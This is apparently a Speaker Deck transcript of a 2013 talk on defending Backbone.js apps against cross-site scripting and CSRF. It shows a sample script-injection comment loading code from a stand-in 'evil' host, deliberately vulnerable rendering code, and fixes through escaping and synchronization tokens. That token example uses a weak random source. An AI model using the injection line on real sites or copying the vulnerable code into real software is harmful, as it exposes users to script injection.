Save 37% off PRO during our Black Friday Sale! »

Securing JavaScript Web Applications

A5b424d4146905962a24acd6815aeb84?s=47 Stephen Thomas
June 17, 2013
Technology
4
370

Securing JavaScript Web Applications

A5b424d4146905962a24acd6815aeb84?s=128

Stephen Thomas

June 17, 2013
Tweet

More Decks by Stephen Thomas

See All by Stephen Thomas
A5b424d4146905962a24acd6815aeb84?s=48 sathomas
0
23
A5b424d4146905962a24acd6815aeb84?s=48 sathomas
0
82
A5b424d4146905962a24acd6815aeb84?s=48 sathomas
0
2.2k
A5b424d4146905962a24acd6815aeb84?s=48 sathomas
1
2.3k
A5b424d4146905962a24acd6815aeb84?s=48 sathomas
0
2.2k
A5b424d4146905962a24acd6815aeb84?s=48 sathomas
5
2.4k
A5b424d4146905962a24acd6815aeb84?s=48 sathomas
8
670
A5b424d4146905962a24acd6815aeb84?s=48 sathomas
2
290

Other Decks in Technology

See All in Technology
C082aa76a5e47f5f99e74043452d4ffe?s=48 akakou
1
260
53850955f15249a1a9dc49df6113e400?s=48 line_developers
PRO
0
200
3cb071df50ed06febdfb3262fb5a67a3?s=48 hiashisan
0
450
7a29c02251394fc05ebd88c631c562dc?s=48 takufujii
0
340
5afa0b3a91d287fdf8b248a118a3975d?s=48 y503unavailable
0
180
6271a2c3d1c1f6d23f0d758bdf47626c?s=48 sunaotabata
18
36k
C422cc033079e005fd1aa1b845b099da?s=48 meow_noisy
0
430
Ecad9d801d79f6c6e5df93094690685e?s=48 sinsoku
0
200
3dadebc0f79d74e50d8bfe5208cb7662?s=48 nadare881
0
900
966e29b84ae7dbde170f66b0bc75b7a6?s=48 ishiayaya
0
140
4bd69b0ec8e5731a5332ee100ad8fb6d?s=48 entaku
1
790
745caa382e7298ca099e1e43e927e111?s=48 noko
0
150

Featured

See All Featured
812e1705ff0f8bc1bcf18587bde687d5?s=48 62gerente
595
210k
7559f6cff1f5efc2d210965febd4d71c?s=48 bermonpainter
349
27k
78b475797a14c84799063c7cd073962f?s=48 holman
451
140k
32de0bd2ba869609d26fd052a4622778?s=48 cromwellryan
108
6.6k
Fe6b81005d1553accd6b2a28f6a2bef1?s=48 phodgson
92
4.3k
465724d73fe3a92c0879fdfb43a3a6f3?s=48 philhawksworth
196
17k
15f2b8221f247985a27a627d2ece72f0?s=48 pauljervisheath
195
16k
64827b31aef81498662e8af4bd6d5157?s=48 jonrohan
1021
410k
Dafc4723e9a1c067796c0fec6f509774?s=48 lemiorhan
634
50k
48c098b6579220a67a6ba949be6e4b5a?s=48 revolveconf
204
10k
0c6fd6a08d0f898159cda7cafcacf07f?s=48 afnizarnur
181
14k
B3d6434763caa0ef5dc4b792662c49f7?s=48 smashingmag
236
18k

Transcript

  1. stephen@sathomas.me icon-comment icon-comment-alt icon-comments icon-comments-alt icon-credit-card icon-dashboard icon-download icon-download-alt icon-edit

    icon-envelope icon-envelope-alt icon-key icon-leaf icon-legal icon-lemon icon-lock icon-unlock icon-magic icon-magnet icon-map-marker icon-minus icon-minus-sign icon-resize-horiz icon-resize-verti icon-retweet icon-road icon-rss icon-screenshot icon-search icon-share icon-share-alt icon-shopping-c http://speakerdeck.com/sathomas icon-paper-clip icon-indent-right icon-tab Directional Icons icon-arrow-down icon-arrow-left icon-arrow-right icon-arrow-up icon-chevron-down icon-circle-arrow-down icon-circle-arrow-left icon-circle-arrow-right icon-circle-arrow-up icon-chevron-left icon-car icon-car icon-car icon-car icon-ch Video Player Icons icon-play-circle icon-play icon-step-backward icon-fast-backward icon-fas icon-ste Securing JavaScript Web Applications Stephen Thomas

  2. Most Common Attacks on Web Applications 1. Cross Site Scripting

    (XSS) 2. Cross Site Request Forgery (CSRF) (both are based on JavaScript) Source: Computer Weekly (quoting FireHost)

  3. Cross Site Scripting (What you think) your.web.app.com victim great content

  4. your.web.app.com victim great content + attack script evil.web.site.com 1 2

    Cross Site Scripting (Reality)

  5. The Vulnerability: User Supplied Content I like your post. Comment:

    Submit

  6. Naively Collect Content var NewCommentView = Backbone.View.extend({ ... events: {

    "click button": "save" }, save: function(ev){ ev.preventDefault(); var newComment = this.$('input[name=comment]').val(); this.model.save({newComment: newComment}); }, ... });

  7. Naively Render Content var CommentView = Backbone.View.extend({ ... template: _.template('<p><%=

    comment %></p>'), render: function(){ this.$el.html(this.template(this.model.toJSON())); }, ... });

  8. The Attack I like your post. <script src="http://evil.web.site.com.badscript.js"> </script> Comment:

    Submit

  9. Naively Collect Content (including the script tag) var NewCommentView =

    Backbone.View.extend({ ... events: { "click button": "save" }, save: function(ev){ ev.preventDefault(); var newComment = this.$('input[name=comment]').val(); this.model.save({newComment: newComment}); }, ... });

  10. Deliver the Content your.web.app.com victim great content + attack script

    1

  11. Naively Render Content (including the script tag) var CommentView =

    Backbone.View.extend({ ... template: _.template('<p><%= comment %></p>'), render: function(){ this.$el.html(this.template(this.model.toJSON())); }, ... });

  12. your.web.app.com victim great content + attack script evil.web.site.com 1 2

    Cross Site Scripting

  13. The Fix: Turn Bad Content I like your post! <script

    src="http://evil.web.site.com/badscript.js"> </script>

  14. The Fix: Into Safe Content I like your post! &lt;script

    src=&quot;http://evil.web.site.com/ badscript.js&quot;&gt; &lt;/script&gt;

  15. Escape on Input var NewCommentView = Backbone.View.extend({ ... events: {

    "click button": "save" }, save: function(ev){ ev.preventDefault(); var newComment = _.escape( this.$('input[name=comment]').val() ); this.model.save({newComment: newComment}); }, ... });

  16. Escape on Input var NewCommentView = Backbone.View.extend({ ... events: {

    "click button": "save" }, save: function(ev){ ev.preventDefault(); var newComment = _.escape( this.$('input[name=comment]').val() ); this.model.save({newComment: newComment}); }, ... });

  17. Naively Render Content var CommentView = Backbone.View.extend({ ... template: _.template('<p><%=

    comment %></p>'), render: function(){ this.$el.html(this.template(this.model.toJSON())); }, ... });

  18. Naively Render Content var CommentView = Backbone.View.extend({ ... template: _.template('<p><%=

    comment %></p>'), render: function(){ this.$el.html(this.template(this.model.toJSON())); }, ... });

  19. Safely Render Content var CommentView = Backbone.View.extend({ ... template: _.template('<p><%=

    comment %></p>'), render: function(){ this.$el.text(this.template(this.model.toJSON())); }, ... });

  20. Naively Render Content var CommentView = Backbone.View.extend({ ... template: _.template('<p><%=

    comment %></p>'), render: function(){ this.$el.html(this.template(this.model.toJSON())); }, ... });

  21. Naively Render Content var CommentView = Backbone.View.extend({ ... template: _.template('<p><%=

    comment %></p>'), render: function(){ this.$el.html(this.template(this.model.toJSON())); }, ... });

  22. Safely Render Content var CommentView = Backbone.View.extend({ ... template: _.template('<p><%-

    comment %></p>'), render: function(){ this.$el.html(this.template(this.model.toJSON())); }, ... });

  23. Cross Site Request Forgery (What you think) your.web.app.com suspicious.web.site.com

  24. your.web.app.com suspicious.web.site.com Cross Site Request Forgery (Reality)

  25. • JavaScript code loaded from suspicious.web.site.com can issue AJAX requests

    to your.web.app.com • If the user has a tab or window open to your.web.app.com, those AJAX requests will include your session authorization cookies. • Your server will think they’re legitimate requests and respond accordingly. The Vulnerability: AJAX Requests

  26. The Fix: Synchronization Tokens <?php setcookie("X-CSRF-Token", sha1(rand())); echo file_get_contents( "index.html"

    ); ?> • Server sends an additional cookie that is set to a random value.

  27. The Fix: Synchronization Tokens var csrf = readCookie("X-CSRF-Token"); if (csrf)

    { myApp.originalSync = Backbone.sync; Backbone.sync = function(method, model, options) { options || (options = {}); options.headers = { "X-CSRF-Token": csrf }; return myApp.originalSync(method,model,options); }; }

  28. The Fix: Synchronization Tokens var csrf = readCookie("X-CSRF-Token"); if (csrf)

    { myApp.originalSync = Backbone.sync; Backbone.sync = function(method, model, options) { options || (options = {}); options.headers = { "X-CSRF-Token": csrf }; return myApp.originalSync(method,model,options); }; } • Client reads the value of this special cookie.

  29. The Fix: Synchronization Tokens var csrf = readCookie("X-CSRF-Token"); if (csrf)

    { myApp.originalSync = Backbone.sync; Backbone.sync = function(method, model, options) { options || (options = {}); options.headers = { "X-CSRF-Token": csrf }; return myApp.originalSync(method,model,options); }; } • Client returns the value as a custom HTTP header.

  30. The Fix: Synchronization Tokens <?php if ($_SERVER['HTTP_X_CSRF_TOKEN'] != $_COOKIE['X-CSRF-Token']) {

    header('Status: 403 Forbidden'); exit(); } /* process request normally */ ?> • Server makes sure custom HTTP header is present and matches the cookie.

  31. Why Do Synchronization Tokens Work? Even though AJAX requests that

    suspicious.web.site.com makes to your.web.app.com will include your cookies, Javascript code from suspicious.web.site.com cannot read the values of those cookies. It cannot, therefore, set the custom HTTP header values for which your server is checking.

  32. Single Page Web Apps • Don’t re-learn old lessons the

    hard way. • Protect against JavaScript-based attacks such as XSS and CSRF. • Oh yeah, protect against other attacks (SQL Injection) also.